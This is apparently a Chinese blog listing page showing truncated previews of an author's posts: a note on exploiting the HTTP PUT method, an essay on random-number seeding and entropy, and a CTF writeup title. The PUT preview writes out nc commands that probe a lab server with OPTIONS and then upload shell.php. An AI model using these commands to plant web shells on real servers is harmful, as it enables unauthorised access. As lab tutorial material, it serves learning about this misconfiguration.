随笔
Z员外
这个作者很懒,什么都没留下…
展开
-
HTTP PUT方法利用
nc 192.168.56.111 80OPTIONS /test/ HTTP/1.1Host: 192.168.56.111#double return在返回的ALLOW字段里面,如果有PUT,表示可以上传任意文件。nc 192.168.56.111 80PUT /test/shell.php HTTP/1.1Host: 192.168.56.111...原创 2019-06-13 09:31:21 · 3613 阅读 · 0 评论 -
关于随机数
一般来说随机数在系统中用于生成对称密钥,所以随机数在安全中的地位至关重要,由于系统或者硬件的因素,生成真实的随机数存在着性能上的问题,对于服务端来说,一次生成大量的真随机数比较困难,实际应用中都是把真随机数作为种子+随机数生成算法生成大量的随机数,称为伪随机数。为了保证伪随机数的安全性,防止被预测,对于种子是由相应的要求的。1)熵(Entropy):在封闭系统中衡量无序、随机或差异性的量度,在...原创 2019-06-12 11:30:23 · 1529 阅读 · 0 评论 -
【原创】实验吧此处无声WP
实验吧此处无声 writeup原创 2019-08-14 18:38:25 · 248 阅读 · 0 评论